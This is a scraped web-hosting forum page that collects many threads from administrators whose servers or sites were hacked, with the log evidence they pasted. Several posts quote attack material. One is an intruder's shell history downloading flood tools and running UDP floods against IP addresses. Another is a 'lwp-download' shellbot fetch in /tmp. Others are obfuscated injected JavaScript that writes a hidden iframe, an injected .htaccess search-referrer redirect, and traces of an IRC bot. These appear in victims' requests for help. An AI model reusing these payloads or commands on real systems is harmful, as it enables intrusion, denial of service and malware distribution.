Web Hosting :: CentOS - My System Is Hacked

Been Hacked
I have a server with about 100 domains on it in Plesk. I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.

About a week ago we received a "too many connections" error when accessing Plesk. This is our server and it sits at The Planet (formerly EV1). I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff. (I'm more of a php / html kind of guy).

I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server. It's clearly spam of some kind. I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.

View Replies! View Related

I Got Hacked
Well, this is rather weird. I cant tell if this is a server error, or a hack.

Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them.

View Replies! View Related

Hacked
My cpanel server has an intruder who brought all the sites down. I did my best to harden the server a year or so ago, but...

I got an email from one of my scripts:

SUBJECT: [hackcheck] kill has a uid 0 account

IMPORTANT: Do not ignore this email.
This message is to inform you that the account kill has user id 0 (root privs).
This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

To say the least, the server was compromised. I cannot find the user "0" or "kill" in WHM, but under "Wheel Group Users" "kill" is listed under "Add a user to the wheel group."

Any help or insight would be appreciated! Anyone proficient at hardening servers and exorcising hackers?

I uploaded the latest chkrootkit and ran it. The results say it's clean.

View Replies! View Related

Am I Hacked And Anything I Can Do
Am I hacked by somebody?

Any thing I can do to stop this (for example by hiring server management company)???

Here's the info that RKHunter provided:

/sbin/modinfo [ NA ]
/sbin/insmod [ NA ]
/sbin/depmod [ NA

Rootkit 'RH-Sharpe's rootkit'... [ Warning! ]

--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------

Checking users with UID '0' (root)... [ Warning! (some users in root group) ]
info: adm:0

And here's the info I've found after investigation:

-bash-2.05b# pwd
/usr/local/games
-bash-2.05b# ls -lah
total 332K
drwxr-xr-x 3 root root 4.0K Feb 5 15:59 .
drwxr-xr-x 15 root root 4.0K Feb 12 19:32 ..
drwxr-xr-x 3 1555 1555 4.0K Feb 2 12:58 .fl
-rwxr-xr-x 1 root root 263K Feb 2 12:51 ettercap
-rwxr-xr-x 1 root root 17K Feb 2 12:51 parse
-rw-r--r-- 1 root root 119 Feb 2 12:51 pid
-rw-r--r-- 1 root root 27K Feb 3 17:44 x
-bash-2.05b#

View Replies! View Related

Am I Hacked
i daily check my error log files to see if something was wrong , checkout what i found

the first one is probably trying to hack my site to get to my ads and changing it to them i think
[error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
[error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
[error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpadsnew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpads
[error] [client 195.23.16.24] File does not exist: /var/www/html/Ads
[error] [client 195.23.16.24] File does not exist: /var/www/html/ads

this 1 I dont know

[error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
[error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/_vti_bin
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice

This 1 is kinda keep me scared i dont know what it is either

[Mon May 21 16:11:00 2007] [error] [client 129.29.227.4] Invalid URI in request T 5.1; U; en)
[Tue May 22 15:59:09 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179781859
[Tue May 22 16:09:15 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:20 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:29 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179868171
[Tue May 22 16:30:23 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179869368
[Tue May 22 16:30:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:30:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0

View Replies! View Related

Hacked
my server hacked

24 cat /proc/cpuinfo
25 ls
26 cd /var/tmp
27 ps x
28 ls
29 mkdir .www
30 cat /proc/cpuinfo
31 cat /etc/issue
32 mkdir .ww
33 cd .ww

36 download alexscan.tar.gz
37 tar xvfz alexscan.tar.gz
38 tar xvf alexscan.tar.gz
39 cd Vek
40 ls
41 ./Vek 210
42 ls
43 cd ..
44 ./ss
45 ls
46 cd ..
47 cd .ww
48 download joker.tgz
49 tar xvfz joker.tgz
50 download flood-udp.tar
52 tar xvfz flood-udp.tar
53 tar xvf flood-udp.tar
54 perl udp.pl 72.8.131.39 0 0
55 perl udp.pl 89.42.72.6 0 0
56 perl udp.pl 83.42.64.149 0 0
57 passwd
58 ls
59 cd joker
60 ls
61 chmod +x *
62 ./x 23.12

View Replies! View Related

Hacked? Or Not
I have a new server and I have hardened it with csf+lfd. It's about 65/70 in the cfs score.

This morning, I noted that lfd log sent me an email saying there is a SSH login via 207.210.233.128 on 10th May 2007. I am not sure whether it was a successful login or not?

Here is the output:
=================
Time: Thu May 10 01:31:52 2007IP: 207.210.233.128 (Unknown)Account: rootMethod: password authentication
========================

I know for sure that I did not login my SSH yesterday.

However, when I logged in SSH this morning, it says in telnet that my last login was from my own home computer's IP, so from that it looks like no one else has logged in SSH since last time I logged in myself.

Was my server intruded or was lfd just playing up?

View Replies! View Related

I've Been Hacked
Go to this page:

[url]

how I can find out what page they have changed? It is a php file with loads of includes etc. Not sure where to look! Or could it be a redirect or something?

View Replies! View Related

Slow System
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

View Replies! View Related

Invoicing System
Is there any billing software/scripts that enable customer to view their invoice without login?

View Replies! View Related

KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?

View Replies! View Related

System Cleaning
Is there anything like System cleaning in VPS (Linux with apache) ? I need to do system cleaning so that my space and performance can increase.

Is there anything like that in Linux?

View Replies! View Related

System Warning
Ive been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. Im hoping someone here can point me in the right direction. Im running Windows 2003 Web Edition.

Quote:

Event Type:Warning
Event Source:LSASRV
Event Category:SPNEGO (Negotiator)
Event ID:40960
Date:3/20/2007
Time:7:45:33 PM
User:N/A
Computer:B02S08MR
Description:
The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request.
(0xc000005e)".

For more information, see Help and Support Center at
[url]
Data:
0000: 5e 00 00 c0

View Replies! View Related

System Logs
I keep receiving hacking attempts from someone accessing my server and running commands like these:

Code:
hubberfix

sh -c cd /tmp;lwp-download [url]
shellbot

I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.

Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.

View Replies! View Related

Which Operating System
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron.

CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware

View Replies! View Related

Whole System Backup
I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc.

I dont want to see that some day something crash - and I will must start over with everything.

What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc.

I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.

View Replies! View Related

Linux System
I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?

Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc.

how to download tar file using Terminal,

View Replies! View Related

Website Hacked
So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message! However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./

When I removed the period, the site appeared as normal. I don't know anything about the server other than it's IIS. Is there anything I can suggest to them when I go in to interview? I'd like to point this out to them; it may even help my chances at landing the job! (It's not related to networking, though.)

View Replies! View Related

WHMCS Hacked
Now, first of all... I'm not sure if this is a problem with WHMCS or some other piece of software with a security hole, but I thought I should post here.

Our WHMCS got hacked earlier today and the hacker sent out a to be honest, unacceptable email to all clients, I won't go into detail but lets just say it directly insulted them.

Now apart from ruining our reputation and client relationships, I am now completely paranoid that it will happen again. I'd also like to know how it happened in the first place. The hacker signed up for a hosting account, and then sent the email. I have no idea how he/she did it, but when I look at the admin log in WHMCS, it shows the username "hacked" as logging in (see image).http://img378.imageshack.us/img378/2560/hackedmh9.png

Just a warning to everyone out there. His IP address was 86.132.228.82.

View Replies! View Related

SITE WAS HACKED!
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?

View Replies! View Related

We Were Hacked, Where Do We Start.
we have a vps server and someone did what I would call a calling card attack, thankfully.

It is a stock kubuntu os with stock apache. Root passwords for everything have been changed to our own

Somehow they logged into kubuntu as root and changed the htpasswd in usr/passwords (changed to protect the password).

Then since they changed the htpasswd they were able to log into phpmyadmin and changed the admin password in the database.

I'm pretty sure I know who did it and he is teaching us a lesson which I respect but he will not comunicate with us.

We have hourly snapshots of our vps and we need to know how they are getting in. See my sig and click on the hotspot login.

Looking at the sudoers there is the Defaults line that we suspect as a means to get in.

We have a great php etc... app but it is either Apache or kubuntu that they can get in.

I would like to learn about what needs to be done about security but where do I start?

Can someone help me look for something that would allow the attack?

I'm a php guy and it is not a mysql injection attack nor is it an xss attack.

I am not a kubuntu / server security guy and now need your advice.

View Replies! View Related

Hacked VPS
I am renting a 384mb Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks including dictionary attacks. My host has cleaned up the mess. I suspect access was gained thru a weak password choice or thru a Wordpress hack.

The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?

View Replies! View Related

My Site Has Been Hacked
One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.

Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.

I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.

View Replies! View Related

My Server Seems Be Hacked
SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini

- How I can check he has made any backdoor for himself or not?
and I have made a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.

- How I can remove them?

View Replies! View Related

Was My Server Being Hacked ?
217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"

What is mean ? Sorry for ask a fast answer. I have change my domain's IP to protect someone can run dangerous script...

View Replies! View Related

My Server Hacked?
My dedicated server was rather slow. Upon checking, I had a new cron job, (deleted now) made by apache, pinting to the following IRC bot.

[root@server50040 tmp]# cd .LiveZone/
[root@server50040 .LiveZone]# ls -al
total 384
drwxr-xr-x 10 apache apache 4096 Dec 21 12:17 .
drwxrwxrwt 3 root root 4096 Dec 21 12:15 ..
-rwxr-xr-x 1 apache apache 320 Dec 9 2004 config
-rw------- 1 apache apache 1002 Dec 9 2004 config.h
-rw-rw-r-- 1 apache apache 55 Dec 20 22:55 cron.d
-rwxr-xr-x 1 apache apache 347 Dec 9 2004 ****
drwxr-xr-x 2 apache apache 12288 May 31 2002 help
-rwxr-xr-x 1 apache apache 210216 Dec 9 2004 httpd
drwxr-xr-x 2 apache apache 4096 Jan 12 2002 lang
-rw------- 1 apache apache 492 Dec 21 12:17 livezone
-rw-rw-r-- 1 apache apache 19 Dec 20 22:55 livezone.dir
-rw------- 1 apache apache 492 Dec 21 12:09 livezone.old
drwxr-xr-x 2 apache apache 4096 Dec 21 12:10 log
-rw-r--r-- 1 apache apache 2137 Sep 26 2003 Makefile
-rw-r--r-- 1 apache apache 731 Dec 9 2004 makefile.out
-rwxr-xr-x 1 apache apache 15090 Dec 9 2004 makesalt
drwxr-xr-x 3 apache apache 4096 Jul 30 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Jul 17 2000 motd
-rwxr-xr-x 1 apache apache 14306 Nov 13 2003 proc
-rw------- 1 apache apache 6 Dec 21 12:10 psybnc.pid
-rw-r--r-- 1 apache apache 10780 Dec 9 2004 README
-rwxr-xr-x 1 apache apache 68 Jun 4 2004 run
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 scripts
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 src
-rw------- 1 apache apache 3901 Jan 12 2002 targets.mak
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 tools
-rwxr--r-- 1 apache apache 21516 Sep 25 2002 xh
-rwxrw-r-- 1 apache apache 194 Dec 20 22:55 y2kupdate

View Replies! View Related

Server Hacked ...
My server was hacked some time ago. I've changed passwords and scanned system for viruses, but found nothing.

Now, I'm looking into the log file /var/log/messages and I have few questions:

1. There are a lot of messages like: Apr 2 02:53:09 host
sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh
ruser= rhost=203.196.151.235

Do these messages mean that hacker trying to enter the server under root?

2. There are messages like these:
Apr 2 03:56:10 host clamd[4678]: stream 1255: Worm.SomeFool.P.2 FOUND
Apr 2 10:46:10 host clamd[4678]: stream 2008: Worm.Bagle.pwd-eml FOUND

What does this mean? Virus on my server or something else?

3. Also, I can see a lot of messages like this one:
Apr 2 09:38:40 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND

Does someone read my emails?

View Replies! View Related

New Server Hacked
My server just got hacked i just bought it!!

and they was going to charge me anouther $35 to reset the password how stupid...

in the end we got it done free

View Replies! View Related

SwiftNIC Hacked?
does any of you know what actually happened with SwiftNic Servers?

My site (www.wincert.net) is unaccessible for almost 20 hours now and I haven't got a reply from my host! I was located on semi-dedicated server.

I've only got this mail about 12 hours ago:

Dear customers,<br /> <br /> We have discovered that our WHMCS client database may have been compromised in the last 48 hours.  While important information such as credit card data is encrypted it is possible that your password or your server login (if mentioned in a support ticket) may have been exposed.<br /> We encourage all customers to change their billing and Server login passwords ASAP.<br /> <br /> We are still investigating this incident so we can identify any possible weaknesses of our internal systems and take appropriate steps to maximize the <span class="nfakPe">security</span> of your information.<br /> Please let us know if you have any questions or need any assistance<br /> <br /> regards<br /> <span class="nfakPe">Swiftnic</span>

Who should I call, talk to, as for help, 'cause I really need my site back ASAP..

View Replies! View Related

How Do Websites Get Hacked?
Every now and then I'll run into a website that has a message that says it was hacked by a certain hacker. How exactly do this? Do they hack into the actual server or do they somehow get a hold of the website owners FTP info?

View Replies! View Related

Blog Got Hacked
One of my wordpress blogs got hacked and my site is redirecting to a different site.... When I check the phpmyadmin, there is another sql server that I am not familiar with... and there are around 17 table... I cannot delete the tables... I already contacted my host and still waiting for response...

The installed database is "information_schema (17)"

Are you familiar with this?

View Replies! View Related

Has Ipower Been Hacked?
I've had a Ipower hosting account since 2002 and recently even renewed both my service and domain registration.

I recently noticed that a small/odd javascript statement had been added to the bottom of my page and I didnt add it. I noticed this after visiting my page and when my Antivirus alerted me to ' HTML/Dldr.Iframe.DP [virus]' apparently some type of iframe redirect via this script to download malware.

After googling around about "HTML/Dldr.Iframe.DP [virus]" I found another person who has an ipower account mentioning the exact same problem on their site.

Does anybody know anything abou this?

Has anybody heard anything about ipower sites being recently hacked or something?

How and why has this happened? is my site just special and am I lucky? or has this recently also happened to other ipower accounts to?

I've contacted ipower but expect some generic response of no real help.

Most importantly, should I go through my few pages which comprise in fact my quite small site and check to see if they also have been hacked with malicious javascript code? Should I upload new pages? Change my password?

All of my content looks ok and in place, no pages defaced except apprently this small insertion of malicious javascript cod at the bottom of my main index page.

I have pasted just the basic fragment of the code below -

<script>eval(unescape("%77%69%6e%64%6f .....

View Replies! View Related

Site Up And Down- Am I Being Hacked
My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!

And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.

Quote:

<script type="text/javascript" src="swfobject.js"></script>

<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>

What the heck is going on?

View Replies! View Related

Server Hacked
My server was hacked night before last and here is the log

Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58"
Oct 28 10:30:47 server1 [19705]: User root's local password accepted.
Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted.
Oct 28 10:30:47 server1 [19705]: User root, coming from 3a.76.2d.[url], authenticated.

View Replies! View Related

Website Has Been Hacked
Just this week, I believe one of my site has been hacked...or potentially my whole server! When accessing the website (a vBulletin forum), instead of going to the main page, we get a screen that looks like Window's "My Computer" and there is a scan running. Firefox has blocked the site for suspicion.

I am stumped. Where to begin? I have full SSH access to my server (after rebooting it). Thank you in advance.

Server: CentOS Linux 4.3

View Replies! View Related

Ecatel Hacked
quick quote from what i got from a friend on msn:

Quote:

[3:08] @(garrett) Hey Sean
[3:08] @(garrett) Do we know whats going on yet?
[3:09] @(Sean) no
[3:09] @(Sean) ecatel is confused right now
[3:09] @(Sean) hackers may have access to more than helpdesk
[3:10] @(garrett) :/

and from my other friend on msn:

Quote:

ViSiOn says:

i woke up today to find e-mails from the help desk asking for all our servers to get wiped and formatted... so im going to have a few 1000 pissed clients.
ViSiOn says:

all my account info was changed too. i can't do anything. and i can't even reach ecatel via e-mail without my tickets getting deleted.

View Replies! View Related

Site Is Hacked
I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:

[url]

View Replies! View Related

Servage Hacked
We've been hacked, again. By we, I mean, many many servage clients as far as I can tell. Unlike past Javascript injections, this time it is much more serious, at least to me anyhow. Here is what I know:

Somehow, someone has gained full access to my (and again, many others) control panel on servage.net.

While on there, they have generously created their own ftp accounts with full access.

Every website I host with servage had a number of files uploaded to them.

These files consisted of one or more .htaccess files that contained a number of rewrites pointing to the other files they uploaded.

The new files were actually cleverly hidden inside other directories where they would go unnoticed. For example, on some of my sites that have forums, they were put into /forum/include/tmp/(bogus files), and in my galleries, put into such directories as /images/photos/(bogus files).

The files themselves are as follows:
a .htaccess file
css.js
keys.txt
links.txt
main.php
texts.txt
and tpl.php

The links.txt file itself is over 1.9mb and contains links to hundreds of other infected SERVAGE hosted websites ( I have checked at least 30 of them in whois.org and found all are hosted at servage).

Here is an example of the links.txt file:
chipandachair.co.uk/language/include/include/topic~3312.html|black break spring
chipandachair.co.uk/language/include/include/topic~1562.html|free exploited black teens
ra4prints.co.uk/inc/forum/style/group~190.html|nudist photographys
ra4prints.co.uk/inc/forum/style/group~3827.html|my nudist links
And so on and so forth.

Keys.txt is a giant list of pornographic phrases and texts.txt is just random phrases in general.

I have contacted servage about this multiple times and have gotten their basic cookie cutter response of please remove the files from all your websites, change all your passwords and delete the new ftp accounts created. I asked them point blank if they've been hacked and they've continued to say no.

If you are a servage customer, make SURE you log into your control panel RIGHT NOW and check to see if new ftp accounts have been created. After that, look at your website statistics and click on DISPLAYED PAGES and look for odd entries like /blabla.html/links?12982.html or some such thing and pay attention to where the link is showing up (What directory) which will help you remove all of the crap someone put on there.

This is very serious guys... as I said, someone had full access to my Control panel. With that, they could enter into any of my sql databases, fully see all the passwords to each database (as servage kindly shows your password to anyone when you click on connection information) not to mention any sensitive customer data I may have had stored in my databases.

This hack also kills your website in a number of ways:

1) It tries to redirect any page on your site to the index.php uploaded to your site which then directs you to porn sites.

2) This hack spams over 3000 links to google every day, coming from your website, leading to sites that are deemed bad by google. This ruins your page rank and your site, as some of mine have since I missed this latest attack for 2 weeks, will go down the drain.

3) WHen someone googles your website, it will come up with tons of porn links. My daughters site was one of the infected ones... she's 9, and when you look up her site it shows that it goes to porn.

let me know if you've been targeted as well and what we, if anything, can do about it. Servage NEEDS to admit they've been hacked, in fact, the damage to my businesses because of their failure to notify my of these events seems like it should be on their shoulders.

View Replies! View Related

Somebody Hacked My Server ...
I found a process /usr/sbin/httpd was running by nobody, then I did a trace in WHM and found this. Is my server hacked ?

send(4, "@206113irc10quakenet3org1"..., 34, MSG_NOSIGNAL) = 34
poll([{fd=4, events=POLLIN, revents=POLLIN}], 1, 5000) = 1
ioctl(4, FIONREAD, [162]) = 0
recvfrom(4, "@2062012001103irc10quakenet3org1"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("72.36.191.2")}, [16]) = 162
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(6665), sin_addr=inet_addr("83.140.172.210")}, 16) = -1 ETIMEDOUT (Connection timed out)
close(4) = 0
open("/etc/protocols", O_RDONLY) = 4
fcntl64(4, F_GETFD) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0

View Replies! View Related

My Server Has Been Hacked
My websites worked very well some days ago. I've touched nothing on my server since then and now every website I have on it is down!

I have a VPS and have root access.

When I restart my apache web server, my websites are working for about 3 seconds! Then it doesn't work any longer!

I've talked to my host but they may find the error if their technicians look at my server but this will cost!

View Replies! View Related

Has My Server Really Been Hacked
I have a dedicated server on a web host. I have 3 domains hosted on the same server. One of the domains was apparently hacked and a rogue script was installed that was using the exim service to send out spam. At least that's what I thought was going on.

When I contacted tech support at the web host they confirmed that the emails were being sent through my server and told me that there was no way for them to tell me what script was doing it or where it was located in the domain files. At this point I had them stop the exim service on my server so I knew no more spam would be sent out until I could get this web space cleaned up.

I backed up all of my files and the database from that domain and wiped out every file in the domain space by having the web host delete everything from their end. Then I created a new web space for the domain. I didn't load any programs or files whatsoever. Just the bare minimum to support the domain. Then I created the email accounts.

During this process I made sure that I changed every password on the domain. I didn't even use the same login names except for the email accounts. The email account passwords were also new.

As soon as I had the email accounts turned on there was more spam. What I find curious is that I have several email accounts on this domain but it's only one that all of this spam is being sent through. I don't know enough about the mechanics to know if this really is being sent through my server or if someone is just plugging in my email address in the spam.

I have not done anything with the other two domains on the server. Is it possible that even though these are saying they are from the fresh domain space they could be from a script on one of the others? ..............

View Replies! View Related

Hacked At OS Level
my VPS has been hacked as per as the provider emailed me

Your VPS is hacked at OS level. It was running following suspicious processes and bot files were uploaded to it.

-bash-3.00# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1628 600 ? Ss 19:27 0:00 init boot
root 18326 0.0 0.1 2156 1164 ? Ss 19:27 0:00 bash
root 18354 0.0 0.0 2156 524 ? S 19:27 0:00 bash
root 18356 0.0 0.0 1524 468 ? S 19:27 0:00 sed s/.*ifcfg-venet0://
root 18357 0.0 0.0 1780 100 ? T 19:27 0:00 ls -1 bak/ifcfg-venet0:*
root 18358 0.0 0.0 0 0 ? Z 19:27 0:00 [sed] <defunct>
root 11610 0.0 0.0 1628 296 ? Ss 19:32 0:00 init boot
root 11611 0.0 0.1 2156 1200 ? S 19:32 0:00 /bin/bash /etc/rc.d/rc.sysinit
root 11625 0.0 0.0 1484 572 ? S 19:32 0:00 /sbin/initlog -r /etc/rc.d/rc.sysinit
root 11839 0.0 0.0 1456 276 ? Ss 19:32 0:00 minilogd
root 12006 0.0 0.0 2156 532 ? S 19:32 0:00 /bin/bash /etc/rc.d/rc.sysinit
root 12014 0.0 0.0 1780 104 ? T 19:32 0:00 ls ifcfg-lo ifcfg-venet0
root 12021 0.0 0.0 27104 512 ? S 19:32 0:00 sort -k 1,1 -k 2nroot 12022 0.0 0.0 1372 52 ? T 19:32 0:00 sed s/[0-9]/ &/
root 12025 0.0 0.0 1524 464 ? S 19:32 0:00 sed s/ //
root 12030 0.0 0.0 0 0 ? Z 19:32 0:00 [sed] <defunct>
root 12044 0.0 0.0 0 0 ? Z 19:32 0:00 [sed] <defunct>
root 5654 0.0 0.0 1912 392 ? Ss 22:46 0:00 vzctl: ttyp0
root 5655 0.2 0.1 2156 1248 ttyp0 Ss 22:46 0:00 -bash
root 5733 0.0 0.0 2312 764 ttyp0 R+ 22:46 0:00 ps aux
-bash-3.00# cd /usr/local/games/-bash-3.00# ls -a.
.. irc
-bash-3.00# cd irc/-bash-3.00# ls
1 12 15 18 20 23 26 29 31 34 37 4 42 45 48 50 53 56 59 61 64 8 common mfu.txt
r00t ssh
10 13 16 19 21 24 27 3 32 35 38 40 43 46 49 51 54 57 6 62 68.231.ps.22 9 full pass_file skan x
11 14 17 2 22 25 28 30 33 36 39 41 44 47 5 52 55 58 60 63 7 all go.sh ps ss-bash-3.00

how can I know what is the issue over here

View Replies! View Related

Website Hacked
my site is hacked regularly

today when i checked htaccess file i found

Code:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
